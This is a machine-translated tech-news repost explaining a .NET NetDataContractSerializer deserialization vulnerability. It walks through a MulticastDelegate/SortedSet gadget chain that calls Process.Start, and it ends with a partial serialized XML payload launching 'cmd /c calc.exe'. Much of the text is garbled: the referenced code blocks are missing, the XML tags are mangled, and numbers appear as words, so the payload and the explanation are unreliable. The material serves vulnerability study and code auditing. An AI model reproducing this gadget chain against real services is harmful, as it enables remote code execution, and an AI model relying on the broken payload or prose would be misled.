Shulou(Shulou.com)05/31 Report--

How to carry out NetDataContractSerializer deserialization vulnerability analysis, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

I. Preface

NetDataContractSerializer is used like DataContractSerializer to serialize and deserialize data sent in Windows Communication Foundation (WCF) messages. There is an important difference between the two: NetDataContractSerializer contains CLR, which supports type precision by adding additional information and saving references to the CLR type, while DataContractSerializer does not. Therefore, NetDataContractSerializer can be used only if the serialization and deserialization sides use the same CLR type. WriteObject or Serialize methods are used to serialize objects, and ReadObject or Deserialize methods are used to deserialize XML streams. In some scenarios, reading malicious XML streams will cause deserialization vulnerabilities, thus realizing remote RCE attacks. In this paper, the author introduces and repeats them from the perspective of principle and code audit.

II. NetDataContractSerializer serialization

Using WriteObject or Serialize, you can easily convert .NET objects to XML data. Note that NetDataContractSerializer contains the name of the assembly and the type of the serialized type. This additional information can be used to deserialize the XML into a special type, allowing the same type to be used on both the client and the server. The other message is that the z:Id attribute has different meanings on different elements. This is used to handle reference types and whether references can be retained when XML is deserialized. The final conclusion is that this output contains more information than the output of DataContractSerializer. Here is an example to illustrate the problem, first defining the TestClass object

The TestClass object defines three members and implements a static method ClassMethod to start the process. Serialization assigns values to members by creating object instances

The author uses Serialize to get the xml data after serializing the TestClass class

18360Ivan1ee III. NetDataContractSerializer reverse sequence 3.1. Principle and usage of deserialization

The anti-sequence process of NetDataContractSerializer class converts the XML flow into an object and calls several overloaded methods or Serialize methods of ReadObject by creating a new object. Looking at the definition, we can see that it inherits from the XmlObjectSerializer abstract class and IFormatter interface.

The NetDataContractSerializer class implements the WriteObject and ReadObject methods in the XmlObjectSerializer abstract class, as well as the methods defined in IFormatter. The specific implementation code of the author who calls the Deserialize method by creating a new object can refer to the following

In fact, the ReadObject method is also called in the Deserialize method to deserialize.

In the process of deserialization, we use the ReadObject method to call the ReadObjectHandleExceptions method, omit some non-core code, get the properties of the object after deserialization in the InternalReadObject method body, and print out the value of the member Name.

3.2attack vector-MulticastDelegate

A multicast delegate (MulticastDelegate) inherits from Delegate and can have delegates with multiple elements in its call list. Virtually all delegate types are derived from MulticastDelegate. The _ invocationList field of the MulticastDelegate class refers to the delegate array when constructing the delegate chain, but in order to gain more control over the delegate chain, you have to use the GetInvocationList method, which has a list of delegates with links. When the delegate instance is called, it will be called synchronously according to the delegate order in the list, so how to add calc.exe to the GetInvocationList list method? First, take a look at the Comparison class, which is used in the command space System.Collections.Generic and is defined as follows

The Comparison class returns the delegate, and then uses the public static method Combine of the Delegate or MulticastDelegate class to add the delegate to the chain as a type comparator for Comparison

Use Comparer's static method Create to create a comparator. Comparator objects are frequently used in .NET collection classes and have custom deserialization capabilities. Here, the SortedSet class is selected, and the internal Comparer object reconstructs the sorting of the collection during deserialization.

The invocation list GetInvocationList method of the multicast delegate internally constructs and initializes an array so that each element references a delegate in the chain and then returns a reference to the array. The following code modifies the private field _ InvocationList and returns the Process class with the generic delegate Func.

Finally, after passing in the attack payload, the fully serialized poc is obtained, as follows

Code audit 4.1 Deserialize

From the point of view of code audit, you only need to find a controllable Path path to be deserialized, such as the following scenario:

4.2 ReadObject

Both of the above are common and need to be paid close attention to.

V. Review

1. Read the contents of local files in the code

two。 Pass poc xml, pop up calculator web page and return 20000

1. 2mscorlib, Version=4.0.0.0,Culture=neutral, PublicKeyToken=b77a5c561934e089

< a:delegateEntry i:nil="true" />

Compare

< a:targetTypeAssembly z:Ref ="6" i:nil ="true" />

System.String

< a:type z:Id = "10">

System. Comparison `1 [[System.String,mscorlib, Version=4.0.0.0, Culture=neutral,PublicKeyToken=b77a5c561934e089]]

< a:methodName z:Id = "11" >

Start

< a:target i:nil = "true" />

< a:targetTypeAssembly z:Id = "12" >

System, Version=4.0.0.0, Culture=neutral,PublicKeyToken=b77a5c561934e089

< a:targetTypeName z:Id = "13" >

System.Diagnostics.Process

< a:type z:Id = "14" >

System. Function `3 [[System.String,mscorlib, Version=4.0.0.0,Culture=neutral, PublicKeyToken=b77a5c561934e089], [System.String,mscorlib, Version=4.0.0.0,Culture=neutral, PublicKeyToken=b77a5c561934e089], [System.Diagnostics.Process,System, Version=4.0.0.0,Culture=neutral, PublicKeyToken=b77a5c561934e089]]

< method0 z:Id = "15" z:FactoryType = "b:MemberInfoSerializationHolder" z:Type = "System.Reflection.MemberInfoSerializationHolder" z:Assembly = "0" xmlns = "" xmlns:b = " http://schemas.datacontract.org/2004/07/System.Reflection" >

< Name z:Ref = "11" i:nil = "true" />

< AssemblyName z:Ref = "12" i:nil = "true" />

< ClassName z:Ref = "13" i:nil = "true" />

< Signature z:Id = "16" z:Type = "System.String" z:Assembly = "0" >

System.Diagnostics.Process Start (System.String,System.String)

< Signature2 z:Id = "17" z:Type = "System.String" z:Assembly = "0" >

System.Diagnostics.ProcessStart (System.String, System.String)

< MemberType z:Id = "18" z:Type = "System.Int32" z:Assembly = "0" >

eight

< method1 z:Id = "19" z:FactoryType = "b:MemberInfoSerializationHolder" z:Type = "System.Reflection.MemberInfoSerializationHolder" z:Assembly = "0" xmlns = "" xmlns:b = " http://schemas.datacontract.org/2004/07/System.Reflection" >

< Name z:Ref = "8" i:nil = "true" />

< AssemblyName z:Ref = "6" i:nil = "true" />

< ClassName z:Ref = "9" i:nil = "true" />

< Signature z:Id = "20" z:Type = "System.String" z:Assembly = "0" >

Int32 Compare (System.String, System.String)

< Signature2 z:Id = "21" z:Type = "System.String" z:Assembly = "0" >

System.Int32 Compare (System.String,System.String)

< MemberType z:Id = "22" z:Type = "System.Int32" z:Assembly = "0" >

eight

< GenericArguments i:nil = "true" />

< Version z:Id = "23" z:Type = "System.Int32" z:Assembly = "0" xmlns = "" >

two

< Items z:Id = "24" z:Type = "System.String[]" z:Assembly = "0" z:Size = "2" xmlns = "" >

< string z:Id = "25" xmlns = " http://schemas.microsoft.com/2003/10/Serialization/Arrays" >

/ c calc.exe

< string z:Id = "26" xmlns = " http://schemas.microsoft.com/2003/10/Serialization/Arrays" >

Cmd

Finally, a dynamic effect diagram is attached.

This is the end of the answer to the question on how to analyze NetDataContractSerializer deserialization vulnerabilities. I hope the above content can be of some help to you. If you still have a lot of doubts to solve, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.